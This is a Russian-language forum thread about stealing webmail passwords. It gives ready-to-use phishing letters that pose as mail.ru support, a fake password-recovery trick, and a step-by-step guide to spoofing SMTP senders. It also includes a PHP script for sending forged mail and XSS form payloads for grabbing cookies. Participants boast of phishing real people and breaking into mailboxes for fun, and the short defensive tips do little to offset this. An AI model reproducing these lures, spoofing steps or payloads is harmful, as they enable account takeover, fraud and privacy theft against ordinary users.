Как у вас могут украсть мыло

Регистрация на сайте
GRATIS форум > Архивы > ** Компьютер
VGS_mixer
Итак, метод 1-ый.
Самый распространённый способ. Основывается на следующем. Все мы с вами люди, так? У нас у всех одинаковые слабости, недостатки, все мы делаем чисто человеческие ошибки. Вот на этом-то и основана наука славная социальная инженерия. Так, короче. Хакер может написать жертве письмо примерно такого содержания: "Почтовая служба @mail.ru проводит чистку аккаунтов. Если Вы не хотите, чтобы ваш аккаунт был удалён, ответьте на это письмо указав в поле "Тема" Ваш логин и пароль в следующем формате: username; password". Спросишь, почему именно в поле тема? Отвечаю. Конечно, это совсем не обязательно. Просто жертва будет думать, что письмо для автоматической обработки получит робот, а к роботу больше доверия. Вместо чистки аккаунтов можно придумать что-нибудь другое: мол, с вашего ящика идёт рассылка вирусов/спама, вышлите пароль, в противном случае ваш аккаунт будет удалён... Короче, можно дохрена всего придумать.. Гм, чуть не забыл! Письмо может быть написано с правдоподобного мыла, типа admin@mail.ru, support@mail.ru, webmaster@mail.ru... Также, хакер можнет воспользоваться каким-нибудь анонимайзером или послать письмо telnet-клиентом, указав в заголовке "адрес ответа"(reply-to) своё мыло. Таким образом, в поле "от кого" жертва видит, например admin@mail.ru, но при ответе на письмо ответ уйдёт на указанный e-mail.

Метод 2-ой.
Злоумышленник может зарегистрировать где-нить, на народе например, страничку с заголовком типа "Ломаем чужое мыло" и отправить жертве ссылку якобы на хакерскую страничку... На самой страничке может находится текст типа
"На mail.ru несколько МИЛЛИОНОВ пользователей. Есть процент, который имеет слабую память и тупые мозги, чтоб запомнить свой пароль и частенько эти перцы сталкиваются с проблемой забывания пароля Итак, даже небольшой процент от более чем милионной толпы владельцев мыльниц - это тоже своеобразная толпа, которая требует свои пароли. Существуют всякие системы аля "Забыл пароль" в котором вас спрашивают ответ на секретный вопрос, данные, которые Вы вводили при регистрации и т.п. Но самое интересное, что этим занимается не человек, а машина, т.е. обычная программулина !!!! А если есть программа - есть в ней дыра. Теперь приступим к описанию конкретных действий.
Тут все просто. По адресу pass_repair@mail.ru сидит mail-робот, который анализирует запросы на восстановление пароля и в зависимости от этого либо уточняет ваши данные, либо сразу шлет пароль. На сайте есть форма для заполнения с всевозможными параметрами, которая потом шлется роботу со специальным Subject'ом. Фишка в том, что если в сабжект впихнуть не один, а два запроса, то проверятся будет последний ящик, а информация будет выслана для второго! Так шевелим мозгами... Правильно! Высылаем два запроса: в одном сообщаем инфу о ящике жертве, во втором инфу о своем (о своем то мы все знаем wink.gif )

Итак, мы хотим обломать vasya_pupkin@mail.ru
Наш ящик hacker@mail.ru пароль qwerty
Пишем письмо роботу на pass_repair@mail.ru
Subject: login=vasya_pupkin&pass=&answer=;login=hacker&pass=qwerty&answer=

Т.е. первый раз вставляем в тему письма запрос о ящике-жертве - vasya_pupkin@mail.ru : login=vasya_pupkin&pass=&answer=
А потом, через точку с запятой второй запрос, с вашими данными, которые робот проверит и убедится, что они правильные!
login=hacker&pass=qwerty&answer=
Итого : тема сообщения выглядит вот так :
login=vasya_pupkin&pass=&answer=;login=hacker&pass=qwerty&answer=
Все, ждите пасс на ваше мыло!!!"

Заметил подвох? молодец! для "невъехавших" объясню... хакеру достаточно создать свой ящик на почтовом сервере с именем типа pass_repair@mail.ru. Теперь пароли целой стаей летят к нему на мыло! Понял? Ну а дальше ему главное не зевать.. просто быстро поменять секретный пароль/ответ, адрес пересылки(причем ~99%, что там пасс такой же!)

Метод 3-ий.
Большинтсво людей не может удержать в голове туеву хучу паролей, поэтому зачастую используют одинаковые. Хы-хы, мысли есть? Надеюсь, что да, а для остальных объясняю. Хакер пишет жертве письмо с предложением вступить в какое-нить общество, клуб, поучаствовать в лотерее. В письме просит указать ник для вступления в ряды, взломщиков чатов, например wink.gif и пароль для подтверждения его личности. Если жертва достаточна глупа, а взломщик достаточно знает о её/его интересах и сможет угадать, куда он хочет вступить, то вероятность того, что придёт ответ на письмо ~90%. Вероятность того, что он будет совпадать с пассом от ящика ~50-70%. Шансы довольно неплохие.
Ну вот, основы метода соц. инженерии я тебе, вроде, поведал. Думай!.. Мы все с вами потенциальные жертвы! Едем дальше.

4-й Метод. Метод перебора.
Из названия всё ясно и понятно.
Во-первых, хакер может попробовать перебирать пассы вручную, стандартные. Типа qwerty, pass, gfhjklm, 123 и т.д. Метод довольно тупой и шансы на удачу бесконечно стермятся к нулю. Ты бы так стал делать? Вот и правильно и хакер бы тоже не стал!.. Взломщик может использовать прогу для перебора паролей, брутус например. После настройки, он ёё просто запускает и ложится спать wink.gif Но если юзверь не вбил стандартный пасс - на это уйдёт уйма времени! А на диалапе лучше и не пытаться... wink.gif
Далее.

Метод 5-й. Получения пасса через службу восстановления забытого пароля.
Знаешь о существовании таких штучек? Сделано для склеротиков, ну а используется.. сам понимаешь. wink.gif
Злоумышленник узнаёт о жертве как можно больше. Через аську(в инфе), если есть время, а главное желание(и в том случае, если жертва мужского пола), может под бабским ником с ним переписываться... Одним словом, способов дох... эээ.. много короче! wink.gif После он идёт на страницу восстановления, вбивает всю полученную инфу и ждёт, ждёт, ждёт... wink.gif Этот способ наиболее подходит для mail.ru, они там ну очень заботятся о всяких маразматиках, которые не в силах удержать пасс в голове!..

6-й метод. Не взлом как получение пасса, а взлом как получение доступа к ящику.
Долгий и запарный. Но более-менее эффективный.
Итак, после выбора жертвы, хакер начинает рассылать спамные письма от его имени. Если на него кто-нить пожалуется, есть вероятность, что его аккаунт удалат. Но возможно, хакер не захочет ждать, пока кто-то накатит жалобу. В таком случае он может взять любой анонимайзер или список проксей и от различных людей начать слать админу жалобы. Вот, типа, этот нехороший человек заспамил мой ящик/рассылает порнуху/призывы к насилию и т.п. В конце концов ящик грохнут. А ему главное не пропустить этот момент. Как только удалят - взломщик регистрируется под username'ом жертвы. Вся почта будет ссылаться туда же, но читать её будет не хозяин, а хакер... wink.gif

Ещё пара способов:
1. Жертве можно впарить бэкдора. После этого она полностью в алчных до чужой собственности руках хакера.
2. Хакер может написать письмо, на которое жертва не сможет не ответить. Маты там какие-нить.. А как получит ответ, в заголовке смотрит ип, проверяет на шары. Если есть, то тырит файлы, в которых почтовик хранит пароли, если жертва проверяет через браузер, тырит нужные кукисы.

Помимо всего прочего сломать ящик можно (как и провайдера или сайт) хорошо зная дырки - через которые можно утащить пароли или что-то еще. Для этого хакеру надо пытаться самому пролезть туда куда надо. Это, конечно, сложно, так что социальная инженерия (борьба) очень даже отличный способ! Рекомендация лучших соб@ководов..

Делаем выводы, господа...
Не общайтесь с сомнительными поклонницами по аське! wink.gif
Прежде, чем отвечать на сомнительное письмо, загляните в заголовок, не указан ли там в поле "Reply-To" адрес vasya@pupkin.ru, вместо president@whitehouse.gov, с которого вам, якобы, пришло письмо.
Как посмотреть заголовок? Всё очень просто... Если ты читаешь почту прямо на сервере, из браузера, например на @mail.ru, тогда всё, что тебе нужно сделать, так это нажать на ссылочку "заголовок". Загрузится страница, похожая на ту, в которой ты обычно читаешь почту, только вместо письма будет указан его заголовок. В почтовом клиенте "The Bat!", чтобы прочитать заголовок нужно нажать комбинацию клавиш <shift> + <ctrl> + <k>. В Outlook'е это можно сделать, выделив письмо в папке и выбрав из меню правой кнопки мыши пункт Свойства-Подробности. Я сам им не разу не пользовался и вам не советую, дыр много, а по возможностям и наворотам уступает многим клиентам.
Ещё совет: не используйте везде одинаковые пароли. Самый лучший пароль это пароль типа dg#Kn$ или Y#$hGJ. Такой, чтобы его нельзя было подбрать банальным перебором. Для генерирования случайных паролей могу посоветовать программку Password Generator. Там всё предельно просто. Выбираешь длину пароля, символы, которые хотите использовать в нём, коэффициент случайности символов(чем больше, тем реальней слово, напр. gerosvaxa вместо mpwkmscxv), нажимаешь пимпу "Generate" и выбираешь любой понравившийся из списка! А тем, у кого туго с памятью, посоветую записывать пароли не на компе, а завести блокнотик, чтобы никто их не спёр.

Из чего состоит заголовок?
Рассмотрим такой пример:
Received: from mail.bieberdorf.edu (mail.bieberdorf.edu [124.211.3.78]) by mailhost.immense-isp.com (8.8.5/8.7.2) with ESMTP id LAA20869 for ; Tue, 18 Mar 1997 14:39:24 -0800 (PST)
Received: from alpha.bieberdorf.edu (alpha.bieberdorf.edu [124.211.3.11]) by mail.bieberdorf.edu (8.8.5) id 004A21; Tue, Mar 18 1997 14:36:17 -0800 (PST)
From: rth@bieberdorf.edu (R.T. Hood)
To: tmh@immense-isp.com
Date: Tue, Mar 18 1997 14:36:14 PST
Message-Id: <rth031897143614-00000298@mail.bieberdorf.edu>
X-Mailer: Loris v2.32
Subject: Lunch today?

Проведем построчный анализ этих заголовков и выясним, что конкретно каждый из них означает:

Received: from mail.bieberdorf.edu
Это письмо было получено с компьютера, который назвался mail.bieberdorf.edu...

(mail.bieberdorf.edu [124.211.3.78])
...и который действительно называется mail.bieberdorf.edu (т.е., он идентифицировал себя верно) и его IP-адрес 124.211.3.78.

by mailhost.immense-isp.com (8.8.5/8.7.2)
Принимал сообщение компьютер mailhost.immense-isp.com; на нем работала программа sendmail версии 8.8.5/8.7.2 (если ты не знаешь, что эти номера означают - не обращай на них внимания).

with ESMTP id LAA20869
Принимающий компьютер присвоил сообщению идентификационный номер LAA20869. (Эта информация будет использоваться только на данном компьютере, если его администратору потребуется найти это сообщение в протоколах; для всех остальных она обычно не имеет значения.)

for <tmh@immense-isp.com>;
Сообщение адресовано tmh@immense-isp.com. Отметим, что этот заголовок не связан со строчкой "To:".

Tue, 18 Mar 1997 14:39:24 -0800 (PST)
Передача письма производилась во вторник, 18 марта 1997 года в 14:39:24 по тихоокеанскому поясному времени (PST - Pacific Standard Time), отстающему от Гринвичского часового пояса на 8 часов, откуда и взялось "-0800".

Received: from alpha.bieberdorf.edu (alpha.bieberdorf.edu [124.211.3.11]) by mail.bieberdorf.edu (8.8.5) id 004A21; Tue, Mar 18 1997 14:36:17 -0800 (PST)
Эта строка свидетельствует о передаче письма с alpha.bieberdorf.edu (компьютер rth) на mail.bieberdorf.edu; эта передача произошла в 14:36:17 тихоокеанского поясного времени. Посылающая машина назвалась alpha.bieberdorf.edu, ее реальное имя также alpha.bieberdorf.edu и ее IP-адрес 124.211.3.11. На бибердорфском почтовом сервере работает программа sendmail версии 8.8.5 и она присвоила письму для своих внутренних нужд идентификационный номер 004A21.

From: rth@bieberdorf.edu (R.T. Hood)
Письмо было отправлено с адреса rth@bieberdorf.edu, назвавшего свое настояшее имя: R.T. Hood.

To: tmh@immense-isp.com
Письмо было адресовано tmh@immense-isp.com.

Date: Tue, Mar 18 1997 14:36:14 PST
Сообщение было создано во вторник, 18 марта 1997 года в 14:36:14 по тихоокеанскому поясному времени.

Message-Id: <rth031897143614-00000298@mail.bieberdorf.edu>
Сообщению был присвоен этот идентификационный номер (машиной mail.bieberdorf.edu). Этот номер отличается от номеров SMTP и ESMTP ID в заголовках "Received:", потому что он присваивается письму "на всю жизнь", в то время как остальные номера ассоциируются с конкретной операцией передачи письма на конкретной машине, таким образом, эти номера не имеют никакого смысла для остальных машин. Иногда (как в этом примере) номер Message-Id содержит адрес отправителя, но чаще он не несет в себе никакого видимого смысла.

X-Mailer: Loris v2.32
Сообщение было послано программой Loris версии 2.32.

Subject: Lunch today?
Говорит само за себя.

ХУЛИГАН
Респект тебе!!!! Помню один раз парниша использовал метод 2 на моём друге,тот повёлся,я не долго думаю,понял подвох и нам удалось спасти мыльник,с тем юным хакером мы разобрались)).Вот помню давно пробывал метод 1,только по своему,могу сказать что из 10,5 человек велось на этот метод,как говорится у меня пас и я доволен,а юзверь не знает что это был подвох,ну как говорится есть методы и получше,т.к выше перечисленные методы не всегда прокатывают!!!
VGS_mixer
Ну не буду же я всё сразу писать smile.gif И в любом случае, если чел - лох, его уже ничто не спасёт wink.gif
ХУЛИГАН
VGS_mixer,С тобой полностью согласен,ведь они ведутся на эти уловки и шлют нам пас на мыло,а мы этим пользуемся,хотя иногда мыло ламаем и не для дела,а так чтоб развлечся.Скажу не в обиду,но вышеперечисленные методы для начинающих,вот кто этим уже давно занимается,имеет свой опыт по взлому.Но с этих методов я начинал изучать всю систему))).
VGS_mixer
Можно спокойно своровать кукисы, пока человек находится на своём ящике
ХУЛИГАН
Всё реально,но это не так уж и просто!
VGS_mixer
ХУЛИГАН
Могу написать, как это сделать, хотя, соглашусь, это не просто, особенно юзверю smile.gif
ХУЛИГАН
Ну напеши свой метод,интересно узнать твой метод!!!!! smile.gif .Ну я вроде в Юзвери не подавался!!! wink.gif
VGS_mixer
Я лучше напишу, как
*********************************
Написать письма от чужого адреса
*********************************

=====
Intro
=====

В данной статье рассказывается, как отправить письмо так, чтобы в строке "От" стоял желаемый нами адрес. Естественно данного эффекта можно добиться настроив соответствующим образом ваш почтовый клиент (например, The Bat! (www.ritlabs.com)), но цель данной статьи научить вас работать с протоколом (SMTP) напрямую и объяснить как почтовый клиент отправляет почту.

========
Практика
========

Приступим. Вам надо зателнетиться к SMTP-серверу на 25 порт. Это можно сделать входящей в комплект к Windows программой telnet.exe, но т.к. данная программа достаточно неудобна я вам советую PUTTY. Чтобы зателнетиться надо ввести в командной строке следующие (сейчас и далее звездочкой (*) будет обозначаться SMTP-сервер, которые вы решили использовать для отправки письма от чужого адреса):

telnet.exe smtp.*.ru 25

В ответ этому коннекту вы должны получить, что то похожее на:

220 smtp.*.ru ESMTP Sende-mail 8.9.3/8.9.3; Mon, 27 May 2002 17:38:54 +0400 (MSD)

Код 220 означает: "Коннект к серверу прошел успешно". Теперь давайте возьмем за цель послать на адрес lamer@e-mail.ru письмо якобы от support@e-mail.ru . Далее даем команду:

helo e-mail.ru

Вот на этом шаге и выясниться поддерживает используемый вами SMTP-сервер отправку писем или нет. Если он не разрешает (зависит от многих причин связанных с настройкой), то выдаст код 500 со следующим содержимым:

500 Command unrecognized: {{}helo e-mail.ru"

В принципе это произошло и в моем случае, но хочу вам сказать, что многие SMTP-серверы настроены так, что могут вас и обмануть. Мне повезло, так как в данном случае сервер меня обманул и после повторного ввода команды helo e-mail.ru сервер мне ответил:

250 smtp.*.ru Hello 123.dial-up.prov.ru [111.222.111.222], pleased to meet you

Код 250 означает, что команда была верной и сервер ее принял. На будущее хочу сказать, что сервер может обманывать вас и более сильно (например, постоянно выдавая код 500, хотя команду он воспринял как верную). Далее пишем:

e-mail from: support@e-mail.ru

Выше введенная команда задает от кого якобы посылается письмо. Далее вводим:

rcpt to: lamer@e-mail.ru

Этой командой мы задали адрес почтового ящика на который будет послано письмо. Далее мы даем команду data и можем вводить текст письма, а после того как вы закончите его вводить нажмите на Enter, нажмите точку и опять Enter. В ответ на это вы получите:

250 RAA07552 Message accepted for delivery

Это будет сигнализировать об успешной отправке письма.

===============
Аттач в письмах
===============

Многие спросят, а как мне прикреплять к письмам файл и какая для этого служит команда. На самом деле такой команды нет и прикрепленные файлы отсылаются в обычном текстовом виде. Бинарник преобразуется в кодировку MIME base64 (для кодирования бинарника в языке PHP вы можете использовать функцию base64_encode(), а для декодирования base64_decode()) и помещается в теле письма между специальных дескрипторов. Более подробно об этой технологии вы сможете найти доки в любом поисковике.

==================
Способы применения
==================

Способ применения данной возможности (сабж) довольно широк: от обычных приколов над ламерами, до кражи их паролей. Успех кражи паролей зависит только от вашей фантазии и уровня знаний жертвы (очень часто прокатывает на девушках). Смысл заключается в том, чтобы написать письмо якобы от суппортов и убедить жертву отправить пароль от аккаунта на якобы робот системы. Текст письма может быть следующим:

*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
Здравствуйте, пользователь E-mail.ru!

Сегодня на нашем сервере E-mail.ru произошел сбой в системе и
регистрационная информация многих пользователей была потеряна. Мы
просим вас в кратчайшее время отправить письмо на адрес нашего робота
mail_robot@E-mail.ru в следующем формате в теме письма:

login=ваш логин на почтовый ящик;password=ваш пароль на почтовый ящик;

Таким образом, если ваш логин ivan, а пароль 12345, то вы должны
отослать письмо на адрес mail_robot@E-mail.ru в теме письма указав
следующие:

login=ivan;password=12345;

Убедительно просим вас в течении 2 недель с момента получения этого
письма выполнить действия указанные в этом письме или же мы будем
вынуждены по истечении этого срока удалить ваш почтовый ящик.
Приносим вам извинения за предоставленные неудобства.

--
С уважением,
Служба технической поддержки сервера E-mail.ru
support@E-mail.ru
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=

В большинстве случае не грамотный пользователь отправит свой пароль. Хочу заметить, что некоторые почтовые службы фильтруют письма отправленные якобы от их административных ящиков (например, так делает служба mail.ru). Выход из данной ситуации все равно есть - нужно немного модифицировать адрес отправителя (support@e-mail.ru). Например заменить похожие буквы латинского алфавита (u,o,p) на русские или поставить две точки.

===========================
Безопасность злоумышленника
===========================

Под безопасностью понимается скрытие IP-адреса отправителя, так как он записывается в заголовок отправляемого письма (Received: from localhost (123.dial-up.prov.ru [111.222.111.222])) SMTP-сервером. Например в The Bat! посмотреть заголовок письма можно через комбинацию Ctrl+Shift+K (возврат в обратный режим осуществляется той же комбинацией). Добиться скрытия вашего IP можно с помощью работы вашего телнет-клиента, через Socks`ы (довольно хорощий софт делает компания Permeo (http://www.socks.permeo.com)). Но есть и другой способ, а именно написать скрипт (например на PHP) и отправлять письма с сервера, на который будет закачен такой скрипт. В таком случае в качестве IP отправителя - будет IP хостера.
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
<html><head><title>Send-mail</title></head>
<body bgcolor="#ddddd0"><br>
<?php
$email=$_GET['email'];
$topic=$_GET['topic'];
$msg=$_GET['msg'];
$from=$_GET['from'];
if ((isset($email) && $email != "" && preg_match("/\w+([-+.]\w+)*@\w+([-.]\w+)*\.\w+([-.]\w+)*/",$email)) && (isset($topic) && $topic != "") && (isset($msg) && $msg != "") && (isset($from) && $from != ""))
{if (mail($email, $topic, $msg, "From: $from"))
{$email=str_replace("<","&lt;",$email);
$email=str_replace(">","&gt;",$email);
$from=str_replace("<","&lt;",$from);
$from=str_replace(">","&gt;",$from);
echo "<h3 align=\"center\">Ваше сообщение отправленно</h3>
<table border=\"0\" align=\"center\">
<tr><td>Адрес получателя:</td><td><b>$email</b></td></tr>
<tr><td>Тема письма:</td><td><b>$topic</b></td></tr>
<tr><td>Адрес отправителя:</td><td><b>$from</b></td></tr>
</table><p align=\"center\">Текст сообщения: <i><b>$msg</b></i></p>
<h3 align=\"center\"><a href=\"email.php\">&lt;&lt; Вернуться назад</a></h3>";}
else {
echo "<h3 align=\"center\">Ваше сообщение не отправленно!</h3>
<h3 align=\"center\">Причины: вы ввели не корректно данные или сервер отказался отсылать письмо</h3>
<h3 align=\"center\"><a href=\"mail.php\">&lt;&lt; Вернуться назад</a></h3>";}}
else {echo "
<form action=\"mail.php\">
<table border=\"2\" align=\"center\">
<tr><td>Адрес получателя:</td><td><input type=\"text\" name=\"email\" value=\"\" size=\"35\"></td></tr>
<tr><td>Тема письма:</td><td><input type=\"text\" name=\"topic\" value=\"\" size=\"35\"></td></tr>
<tr><td>Текст сообщения:</td><td><textarea name=\"msg\" cols=\"26\" rows=\"2\"></textarea></td></tr>
<tr></tr><tr><td>Адрес отправителя:</td><td><input type=\"text\" name=\"from\" value=\"Bill Gates &lt;BillGates@microsoft.com&gt;\" size=\"35\"></td></tr>
<tr><td align=\"center\"><input type=\"submit\" value=\"Отослать письмо\"></td><td align=\"center\"><input type=\"reset\" value=\"Очистить поля\"></td></tr>
</table>
</form>";}


</body></html>
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=

Ограничением данного скрипта является то, что он не заработает на большинстве бесплатных хостингов по причине того, что на них отключена функция mail() для защиты от спама.
ХУЛИГАН
Хм,не знаю, не знаю,такой метод не слышал!!Действительно работает??? Если да,то обязательно попробую!
VGS_mixer
Работает реально, по крайней мере на www.mail.ru
ХУЛИГАН
QUOTE
Можно спокойно своровать кукисы, пока человек находится на своём ящике

Вот,про это расскажи,уж очень интересно знать.... wink.gif
VGS_mixer
<form method="POST" action="http://vulnerable.com/search"
name="explForm">
<input type=hidden name=q
value="<script>alert(document.cookie)</script>">
</form>
<script language="Javascript">
setTimeout('explForm.submit()', 1);
</script>
(эт XSS)

<form method="POST" action="http://vulnerable.com/search"
name="explForm">
<input type=hidden name=q
value="<script>alert (document.cookie)</script>">
</form>
<script language="Javascript">
window.open("http://vulnerable.com/secure_login");
setTimeout('explForm.submit()', 1000*30);
</script>
(а это POST)
ХУЛИГАН
У...вот с этой фичей не просёк sad.gif ,придётся подумать!!! smile.gif